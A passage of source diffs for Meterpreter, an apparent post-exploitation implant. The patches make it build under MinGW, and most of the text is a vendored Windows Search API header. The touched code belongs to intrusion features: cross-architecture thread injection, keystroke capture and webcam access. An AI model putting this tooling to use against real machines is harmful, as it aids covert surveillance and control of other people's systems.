+				(LPVOID)GetProcAddress(psapi, "GetModuleFileNameExA");
+		
+		if (!getModuleFileNameEx)
 			break;
 
 		// Validate parameters

--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.c
@@ -691,12 +691,18 @@ DWORD request_sys_process_get_info(Remote *remote, Packet *packet)
 		}
 
 		// Try to resolve the necessary symbols
-		if ((!((LPVOID)enumProcessModules =
-				(LPVOID)GetProcAddress(psapi, "EnumProcessModules"))) ||
-		    (!((LPVOID)getModuleBaseName =
-				(LPVOID)GetProcAddress(psapi, "GetModuleBaseNameA"))) ||
-		    (!((LPVOID)getModuleFileNameEx =
-				(LPVOID)GetProcAddress(psapi, "GetModuleFileNameExA"))))
+		enumProcessModules =
+				(LPVOID)GetProcAddress(psapi, "EnumProcessModules");
+				
+		getModuleBaseName =
+				(LPVOID)GetProcAddress(psapi, "GetModuleBaseNameA");
+	
+	        getModuleFileNameEx =
+				(LPVOID)GetProcAddress(psapi, "GetModuleFileNameExA");
+				
+		if ((!enumProcessModules) ||
+		    (!getModuleBaseName) ||
+		    (!getModuleFileNameEx))
 		{
 			result = GetLastError();
 			break;

--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/thread.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/thread.c
@@ -8,7 +8,8 @@ VOID set_thread_register_value(LPCONTEXT, LPCSTR name, ULONG value);
 typedef BOOL (WINAPI *PISWOW64PROCESS)(HANDLE, PBOOL);
 static PISWOW64PROCESS pIsWow64Process = NULL;
 
-BOOL IsWow64Process(HANDLE hProcess)
+
+BOOL _IsWow64Process(HANDLE hProcess)
 {
 	BOOL result = FALSE;
 
@@ -119,8 +120,8 @@ DWORD request_sys_process_thread_create(Remote *remote, Packet *packet)
 
 			if (dwResult == ERROR_ACCESS_DENIED
 				&& dwMeterpreterArch == PROCESS_ARCH_X86
-				&& IsWow64Process(GetCurrentProcess())
-				&& !IsWow64Process(hProcess))
+				&& _IsWow64Process(GetCurrentProcess())
+				&& !_IsWow64Process(hProcess))
 			{
 				dprintf("[THREAD CREATE] Target is x64, attempting wow64 injection");
 

--- a/c/meterpreter/source/extensions/stdapi/server/ui/desktop.c
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/desktop.c
@@ -9,6 +9,10 @@ typedef struct _DESKTOPLIST
 	Packet * response;
 } DESKTOPLIST, *LPDESKTOPLIST;
 
+#ifndef ERROR_DBG_TERMINATE_THREAD
+#define ERROR_DBG_TERMINATE_THREAD 691
+#endif
+
 /*
  * Callback function for EnumDesktops when listing desktops on a station during desktop_list().
  */

--- a/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
@@ -1,7 +1,7 @@
 #include "precomp.h"
 #include "keyboard.h"
 #include <tchar.h>
-#include <Psapi.h>
+#include <psapi.h>
 
 extern HMODULE hookLibrary;
 extern HINSTANCE hAppInstance;

--- a/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.h
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.h
@@ -17,12 +17,15 @@
 * Raw Input Messages.
 */
 
+#ifndef __MINGW32__
 DECLARE_HANDLE(HRAWINPUT);
+#endif
 
 /*
 * Raw format of the mouse input
 */
 
+#ifndef __MINGW32__
 typedef struct tagRAWMOUSE {
 	/*
 	* Indicator flags.
@@ -137,7 +140,7 @@ typedef struct tagRAWINPUT {
 		RAWHID      hid;
 	} data;
 } RAWINPUT, *PRAWINPUT, *LPRAWINPUT;
-
+#endif
 
 typedef UINT(WINAPI *f_GetRawInputData)(
 	__in HRAWINPUT hRawInput,

--- a/c/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c
+++ b/c/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c
@@ -2,8 +2,10 @@
 #include <windows.h>
 #include "precomp.h"
 #include "bmp2jpeg.h"
-#pragma comment(lib, "jpeg.lib")
 
+#ifndef __MINGW32__
+#pragma comment(lib, "jpeg.lib")
+#endif
 /*
  * Please Note: bmp2jpeg.c and bmp2jpeg.h have been coppied over from screen.c
  * screen.h in the espia extension. The origional author of espia is Efrain Torres

--- a/c/meterpreter/source/extensions/stdapi/server/webcam/webcam.cpp
+++ b/c/meterpreter/source/extensions/stdapi/server/webcam/webcam.cpp
@@ -14,7 +14,9 @@
 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>
 #include <dshow.h>
+#ifndef __MINGW32__
 #pragma comment(lib, "strmiids")
+#ifndef __MINGW32__
 extern "C" {
 #include "../../common/common.h"
 #include "webcam.h"

--- a/c/meterpreter/source/extensions/stdapi/server/webcam/webcam.cpp
+++ b/c/meterpreter/source/extensions/stdapi/server/webcam/webcam.cpp
@@ -16,7 +16,7 @@
 #include <dshow.h>
 #ifndef __MINGW32__
 #pragma comment(lib, "strmiids")
-#ifndef __MINGW32__
+#endif
 extern "C" {
 #include "../../common/common.h"
 #include "webcam.h"

--- a/c/meterpreter/source/extra_includes/Searchapi.h
+++ b/c/meterpreter/source/extra_includes/Searchapi.h
@@ -1,0 +1,5448 @@
+
+
+/* this ALWAYS GENERATED file contains the definitions for the interfaces */
+
+
+ /* File created by MIDL compiler version 8.01.0622 */
+/* @@MIDL_FILE_HEADING(  ) */
+
+
+
+/* verify that the <rpcndr.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCNDR_H_VERSION__
+#define __REQUIRED_RPCNDR_H_VERSION__ 500
+#endif
+
+/* verify that the <rpcsal.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCSAL_H_VERSION__
+#define __REQUIRED_RPCSAL_H_VERSION__ 100
+#endif
+
+#include "rpc.h"
+#include "rpcndr.h"
+
+#ifndef __RPCNDR_H_VERSION__
+#error this stub requires an updated version of <rpcndr.h>
+#endif /* __RPCNDR_H_VERSION__ */
+
+#ifndef COM_NO_WINDOWS_H
+#include "windows.h"
+#include "ole2.h"
+#endif /*COM_NO_WINDOWS_H*/
+
+#ifndef __searchapi_h__
+#define __searchapi_h__
+
+#if defined(_MSC_VER) && (_MSC_VER >= 1020)
+#pragma once
+#endif
+
+/* Forward Declarations */ 
+
+#ifndef __IUrlAccessor_FWD_DEFINED__
+#define __IUrlAccessor_FWD_DEFINED__
+typedef interface IUrlAccessor IUrlAccessor;
+
+#endif 	/* __IUrlAccessor_FWD_DEFINED__ */
+
+
+#ifndef __IUrlAccessor2_FWD_DEFINED__
+#define __IUrlAccessor2_FWD_DEFINED__
+typedef interface IUrlAccessor2 IUrlAccessor2;
+
+#endif 	/* __IUrlAccessor2_FWD_DEFINED__ */
+
+
+#ifndef __IUrlAccessor3_FWD_DEFINED__
+#define __IUrlAccessor3_FWD_DEFINED__
+typedef interface IUrlAccessor3 IUrlAccessor3;
+
+#endif 	/* __IUrlAccessor3_FWD_DEFINED__ */
+
+
+#ifndef __IUrlAccessor4_FWD_DEFINED__
+#define __IUrlAccessor4_FWD_DEFINED__
+typedef interface IUrlAccessor4 IUrlAccessor4;
+
+#endif 	/* __IUrlAccessor4_FWD_DEFINED__ */
+
+
+#ifndef __IOpLockStatus_FWD_DEFINED__
+#define __IOpLockStatus_FWD_DEFINED__
+typedef interface IOpLockStatus IOpLockStatus;
+
+#endif 	/* __IOpLockStatus_FWD_DEFINED__ */
+
+
+#ifndef __ISearchProtocolThreadContext_FWD_DEFINED__
+#define __ISearchProtocolThreadContext_FWD_DEFINED__
+typedef interface ISearchProtocolThreadContext ISearchProtocolThreadContext;
+
+#endif 	/* __ISearchProtocolThreadContext_FWD_DEFINED__ */
+
+
+#ifndef __ISearchProtocol_FWD_DEFINED__
+#define __ISearchProtocol_FWD_DEFINED__
+typedef interface ISearchProtocol ISearchProtocol;
+
+#endif 	/* __ISearchProtocol_FWD_DEFINED__ */
+
+
+#ifndef __ISearchProtocol2_FWD_DEFINED__
+#define __ISearchProtocol2_FWD_DEFINED__
+typedef interface ISearchProtocol2 ISearchProtocol2;
+
+#endif 	/* __ISearchProtocol2_FWD_DEFINED__ */
+
+
+#ifndef __IProtocolHandlerSite_FWD_DEFINED__
+#define __IProtocolHandlerSite_FWD_DEFINED__
+typedef interface IProtocolHandlerSite IProtocolHandlerSite;
+
+#endif 	/* __IProtocolHandlerSite_FWD_DEFINED__ */
+
+
+#ifndef __ISearchRoot_FWD_DEFINED__
+#define __ISearchRoot_FWD_DEFINED__
+typedef interface ISearchRoot ISearchRoot;
+
+#endif 	/* __ISearchRoot_FWD_DEFINED__ */
+
+
+#ifndef __IEnumSearchRoots_FWD_DEFINED__
+#define __IEnumSearchRoots_FWD_DEFINED__
+typedef interface IEnumSearchRoots IEnumSearchRoots;
+
+#endif 	/* __IEnumSearchRoots_FWD_DEFINED__ */
+
+
+#ifndef __ISearchScopeRule_FWD_DEFINED__
+#define __ISearchScopeRule_FWD_DEFINED__
+typedef interface ISearchScopeRule ISearchScopeRule;
+
+#endif 	/* __ISearchScopeRule_FWD_DEFINED__ */
+
+
+#ifndef __IEnumSearchScopeRules_FWD_DEFINED__
+#define __IEnumSearchScopeRules_FWD_DEFINED__
+typedef interface IEnumSearchScopeRules IEnumSearchScopeRules;
+
+#endif 	/* __IEnumSearchScopeRules_FWD_DEFINED__ */
+
+
+#ifndef __ISearchCrawlScopeManager_FWD_DEFINED__
+#define __ISearchCrawlScopeManager_FWD_DEFINED__
+typedef interface ISearchCrawlScopeManager ISearchCrawlScopeManager;
+
+#endif 	/* __ISearchCrawlScopeManager_FWD_DEFINED__ */
+
+
+#ifndef __ISearchCrawlScopeManager2_FWD_DEFINED__
+#define __ISearchCrawlScopeManager2_FWD_DEFINED__
+typedef interface ISearchCrawlScopeManager2 ISearchCrawlScopeManager2;
+
+#endif 	/* __ISearchCrawlScopeManager2_FWD_DEFINED__ */
+
+
+#ifndef __ISearchItemsChangedSink_FWD_DEFINED__
+#define __ISearchItemsChangedSink_FWD_DEFINED__
+typedef interface ISearchItemsChangedSink ISearchItemsChangedSink;
+
+#endif 	/* __ISearchItemsChangedSink_FWD_DEFINED__ */
+
+
+#ifndef __ISearchPersistentItemsChangedSink_FWD_DEFINED__
+#define __ISearchPersistentItemsChangedSink_FWD_DEFINED__
+typedef interface ISearchPersistentItemsChangedSink ISearchPersistentItemsChangedSink;
+
+#endif 	/* __ISearchPersistentItemsChangedSink_FWD_DEFINED__ */
+
+
+#ifndef __ISearchViewChangedSink_FWD_DEFINED__
+#define __ISearchViewChangedSink_FWD_DEFINED__
+typedef interface ISearchViewChangedSink ISearchViewChangedSink;
+
+#endif 	/* __ISearchViewChangedSink_FWD_DEFINED__ */
+
+
+#ifndef __ISearchNotifyInlineSite_FWD_DEFINED__
+#define __ISearchNotifyInlineSite_FWD_DEFINED__
+typedef interface ISearchNotifyInlineSite ISearchNotifyInlineSite;
+
+#endif 	/* __ISearchNotifyInlineSite_FWD_DEFINED__ */
+
+
+#ifndef __ISearchCatalogManager_FWD_DEFINED__
+#define __ISearchCatalogManager_FWD_DEFINED__
+typedef interface ISearchCatalogManager ISearchCatalogManager;
+
+#endif 	/* __ISearchCatalogManager_FWD_DEFINED__ */
+
+
+#ifndef __ISearchCatalogManager2_FWD_DEFINED__
+#define __ISearchCatalogManager2_FWD_DEFINED__
+typedef interface ISearchCatalogManager2 ISearchCatalogManager2;
+
+#endif 	/* __ISearchCatalogManager2_FWD_DEFINED__ */
+
+
+#ifndef __ISearchQueryHelper_FWD_DEFINED__
+#define __ISearchQueryHelper_FWD_DEFINED__
+typedef interface ISearchQueryHelper ISearchQueryHelper;
+
+#endif 	/* __ISearchQueryHelper_FWD_DEFINED__ */
+
+
+#ifndef __IRowsetPrioritization_FWD_DEFINED__
+#define __IRowsetPrioritization_FWD_DEFINED__
+typedef interface IRowsetPrioritization IRowsetPrioritization;
+
+#endif 	/* __IRowsetPrioritization_FWD_DEFINED__ */
+
+
+#ifndef __IRowsetEvents_FWD_DEFINED__
+#define __IRowsetEvents_FWD_DEFINED__
+typedef interface IRowsetEvents IRowsetEvents;
+
+#endif 	/* __IRowsetEvents_FWD_DEFINED__ */
+
+
+#ifndef __ISearchManager_FWD_DEFINED__
+#define __ISearchManager_FWD_DEFINED__
+typedef interface ISearchManager ISearchManager;
+
+#endif 	/* __ISearchManager_FWD_DEFINED__ */
+
+
+#ifndef __ISearchManager2_FWD_DEFINED__
+#define __ISearchManager2_FWD_DEFINED__
+typedef interface ISearchManager2 ISearchManager2;
+
+#endif 	/* __ISearchManager2_FWD_DEFINED__ */
+
+
+#ifndef __ISearchLanguageSupport_FWD_DEFINED__
+#define __ISearchLanguageSupport_FWD_DEFINED__
+typedef interface ISearchLanguageSupport ISearchLanguageSupport;
+
+#endif 	/* __ISearchLanguageSupport_FWD_DEFINED__ */
+
+
+#ifndef __ISearchCatalogManager_FWD_DEFINED__
+#define __ISearchCatalogManager_FWD_DEFINED__
+typedef interface ISearchCatalogManager ISearchCatalogManager;
+
+#endif 	/* __ISearchCatalogManager_FWD_DEFINED__ */
+
+
+#ifndef __ISearchCatalogManager2_FWD_DEFINED__
+#define __ISearchCatalogManager2_FWD_DEFINED__
+typedef interface ISearchCatalogManager2 ISearchCatalogManager2;
+
+#endif 	/* __ISearchCatalogManager2_FWD_DEFINED__ */
+
+
+#ifndef __ISearchQueryHelper_FWD_DEFINED__
+#define __ISearchQueryHelper_FWD_DEFINED__
+typedef interface ISearchQueryHelper ISearchQueryHelper;
+
+#endif 	/* __ISearchQueryHelper_FWD_DEFINED__ */
+
+
+#ifndef __ISearchItemsChangedSink_FWD_DEFINED__
+#define __ISearchItemsChangedSink_FWD_DEFINED__
+typedef interface ISearchItemsChangedSink ISearchItemsChangedSink;
+
+#endif 	/* __ISearchItemsChangedSink_FWD_DEFINED__ */
+
+
+#ifndef __ISearchCrawlScopeManager_FWD_DEFINED__
+#define __ISearchCrawlScopeManager_FWD_DEFINED__
+typedef interface ISearchCrawlScopeManager ISearchCrawlScopeManager;
+
+#endif 	/* __ISearchCrawlScopeManager_FWD_DEFINED__ */
+
+
+#ifndef __IEnumSearchScopeRules_FWD_DEFINED__
+#define __IEnumSearchScopeRules_FWD_DEFINED__
+typedef interface IEnumSearchScopeRules IEnumSearchScopeRules;
+
+#endif 	/* __IEnumSearchScopeRules_FWD_DEFINED__ */
+
+
+#ifndef __ISearchManager_FWD_DEFINED__
+#define __ISearchManager_FWD_DEFINED__
+typedef interface ISearchManager ISearchManager;
+
+#endif 	/* __ISearchManager_FWD_DEFINED__ */
+
+
+#ifndef __ISearchManager2_FWD_DEFINED__
+#define __ISearchManager2_FWD_DEFINED__
+typedef interface ISearchManager2 ISearchManager2;
+
+#endif 	/* __ISearchManager2_FWD_DEFINED__ */
+
+
+#ifndef __CSearchManager_FWD_DEFINED__
+#define __CSearchManager_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class CSearchManager CSearchManager;
+#else
+typedef struct CSearchManager CSearchManager;
+#endif /* __cplusplus */
+
+#endif 	/* __CSearchManager_FWD_DEFINED__ */
+
+
+#ifndef __CSearchRoot_FWD_DEFINED__
+#define __CSearchRoot_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class CSearchRoot CSearchRoot;
+#else
+typedef struct CSearchRoot CSearchRoot;
+#endif /* __cplusplus */
+
+#endif 	/* __CSearchRoot_FWD_DEFINED__ */
+
+
+#ifndef __CSearchScopeRule_FWD_DEFINED__
+#define __CSearchScopeRule_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class CSearchScopeRule CSearchScopeRule;
+#else
+typedef struct CSearchScopeRule CSearchScopeRule;
+#endif /* __cplusplus */
+
+#endif 	/* __CSearchScopeRule_FWD_DEFINED__ */
+
+
+#ifndef __FilterRegistration_FWD_DEFINED__
+#define __FilterRegistration_FWD_DEFINED__
+
+#ifdef __cplusplus
+typedef class FilterRegistration FilterRegistration;
+#else
+typedef struct FilterRegistration FilterRegistration;
+#endif /* __cplusplus */
+
+#endif 	/* __FilterRegistration_FWD_DEFINED__ */
+
+
+/* header files for imported files */
+#include "unknwn.h"
+#include "objidl.h"
+#include "ocidl.h"
+#include "propidl.h"
+#include "filter.h"
+#include "filtereg.h"
+#include "propsys.h"
+#include "oledb.h"
+#include "StructuredQuery.h"
+
+#ifdef __cplusplus
+extern "C"{
+#endif 
+
+
+/* interface __MIDL_itf_searchapi_0000_0000 */
+/* [local] */ 
+
+//+----------------------------------------------------------------------------
+//
+//    Copyright (c) 2005 Microsoft Corporation.
+//    Search API Interface
+//
+//-----------------------------------------------------------------------------
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+typedef LONG ITEMID;
+
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0000_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0000_v0_0_s_ifspec;
+
+#ifndef __IUrlAccessor_INTERFACE_DEFINED__
+#define __IUrlAccessor_INTERFACE_DEFINED__
+
+/* interface IUrlAccessor */
+/* [unique][public][helpstring][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IUrlAccessor;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("0b63e318-9ccc-11d0-bcdb-00805fccce04")
+    IUrlAccessor : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE AddRequestParameter( 
+            /* [in] */ __RPC__in PROPSPEC *pSpec,
+            /* [in] */ __RPC__in PROPVARIANT *pVar) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetDocFormat( 
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszDocFormat[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetCLSID( 
+            /* [out] */ __RPC__out CLSID *pClsid) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetHost( 
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszHost[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE IsDirectory( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetSize( 
+            /* [out] */ __RPC__out ULONGLONG *pllSize) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetLastModified( 
+            /* [out] */ __RPC__out FILETIME *pftLastModified) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetFileName( 
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszFileName[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetSecurityDescriptor( 
+            /* [size_is][out] */ __RPC__out_ecount_full(dwSize) BYTE *pSD,
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetRedirectedURL( 
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszRedirectedURL[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetSecurityProvider( 
+            /* [out] */ __RPC__out CLSID *pSPClsid) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE BindToStream( 
+            /* [out] */ __RPC__deref_out_opt IStream **ppStream) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE BindToFilter( 
+            /* [out] */ __RPC__deref_out_opt IFilter **ppFilter) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IUrlAccessorVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IUrlAccessor * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IUrlAccessor * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IUrlAccessor * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddRequestParameter )( 
+            __RPC__in IUrlAccessor * This,
+            /* [in] */ __RPC__in PROPSPEC *pSpec,
+            /* [in] */ __RPC__in PROPVARIANT *pVar);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetDocFormat )( 
+            __RPC__in IUrlAccessor * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszDocFormat[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCLSID )( 
+            __RPC__in IUrlAccessor * This,
+            /* [out] */ __RPC__out CLSID *pClsid);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetHost )( 
+            __RPC__in IUrlAccessor * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszHost[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsDirectory )( 
+            __RPC__in IUrlAccessor * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSize )( 
+            __RPC__in IUrlAccessor * This,
+            /* [out] */ __RPC__out ULONGLONG *pllSize);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetLastModified )( 
+            __RPC__in IUrlAccessor * This,
+            /* [out] */ __RPC__out FILETIME *pftLastModified);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetFileName )( 
+            __RPC__in IUrlAccessor * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszFileName[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSecurityDescriptor )( 
+            __RPC__in IUrlAccessor * This,
+            /* [size_is][out] */ __RPC__out_ecount_full(dwSize) BYTE *pSD,
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetRedirectedURL )( 
+            __RPC__in IUrlAccessor * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszRedirectedURL[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSecurityProvider )( 
+            __RPC__in IUrlAccessor * This,
+            /* [out] */ __RPC__out CLSID *pSPClsid);
+        
+        HRESULT ( STDMETHODCALLTYPE *BindToStream )( 
+            __RPC__in IUrlAccessor * This,
+            /* [out] */ __RPC__deref_out_opt IStream **ppStream);
+        
+        HRESULT ( STDMETHODCALLTYPE *BindToFilter )( 
+            __RPC__in IUrlAccessor * This,
+            /* [out] */ __RPC__deref_out_opt IFilter **ppFilter);
+        
+        END_INTERFACE
+    } IUrlAccessorVtbl;
+
+    interface IUrlAccessor
+    {
+        CONST_VTBL struct IUrlAccessorVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IUrlAccessor_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IUrlAccessor_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IUrlAccessor_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IUrlAccessor_AddRequestParameter(This,pSpec,pVar)	\
+    ( (This)->lpVtbl -> AddRequestParameter(This,pSpec,pVar) ) 
+
+#define IUrlAccessor_GetDocFormat(This,wszDocFormat,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetDocFormat(This,wszDocFormat,dwSize,pdwLength) ) 
+
+#define IUrlAccessor_GetCLSID(This,pClsid)	\
+    ( (This)->lpVtbl -> GetCLSID(This,pClsid) ) 
+
+#define IUrlAccessor_GetHost(This,wszHost,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetHost(This,wszHost,dwSize,pdwLength) ) 
+
+#define IUrlAccessor_IsDirectory(This)	\
+    ( (This)->lpVtbl -> IsDirectory(This) ) 
+
+#define IUrlAccessor_GetSize(This,pllSize)	\
+    ( (This)->lpVtbl -> GetSize(This,pllSize) ) 
+
+#define IUrlAccessor_GetLastModified(This,pftLastModified)	\
+    ( (This)->lpVtbl -> GetLastModified(This,pftLastModified) ) 
+
+#define IUrlAccessor_GetFileName(This,wszFileName,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetFileName(This,wszFileName,dwSize,pdwLength) ) 
+
+#define IUrlAccessor_GetSecurityDescriptor(This,pSD,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetSecurityDescriptor(This,pSD,dwSize,pdwLength) ) 
+
+#define IUrlAccessor_GetRedirectedURL(This,wszRedirectedURL,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetRedirectedURL(This,wszRedirectedURL,dwSize,pdwLength) ) 
+
+#define IUrlAccessor_GetSecurityProvider(This,pSPClsid)	\
+    ( (This)->lpVtbl -> GetSecurityProvider(This,pSPClsid) ) 
+
+#define IUrlAccessor_BindToStream(This,ppStream)	\
+    ( (This)->lpVtbl -> BindToStream(This,ppStream) ) 
+
+#define IUrlAccessor_BindToFilter(This,ppFilter)	\
+    ( (This)->lpVtbl -> BindToFilter(This,ppFilter) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IUrlAccessor_INTERFACE_DEFINED__ */
+
+
+#ifndef __IUrlAccessor2_INTERFACE_DEFINED__
+#define __IUrlAccessor2_INTERFACE_DEFINED__
+
+/* interface IUrlAccessor2 */
+/* [unique][public][helpstring][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IUrlAccessor2;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("c7310734-ac80-11d1-8df3-00c04fb6ef4f")
+    IUrlAccessor2 : public IUrlAccessor
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE GetDisplayUrl( 
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszDocUrl[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE IsDocument( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetCodePage( 
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszCodePage[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IUrlAccessor2Vtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IUrlAccessor2 * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IUrlAccessor2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddRequestParameter )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [in] */ __RPC__in PROPSPEC *pSpec,
+            /* [in] */ __RPC__in PROPVARIANT *pVar);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetDocFormat )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszDocFormat[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCLSID )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [out] */ __RPC__out CLSID *pClsid);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetHost )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszHost[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsDirectory )( 
+            __RPC__in IUrlAccessor2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSize )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [out] */ __RPC__out ULONGLONG *pllSize);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetLastModified )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [out] */ __RPC__out FILETIME *pftLastModified);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetFileName )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszFileName[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
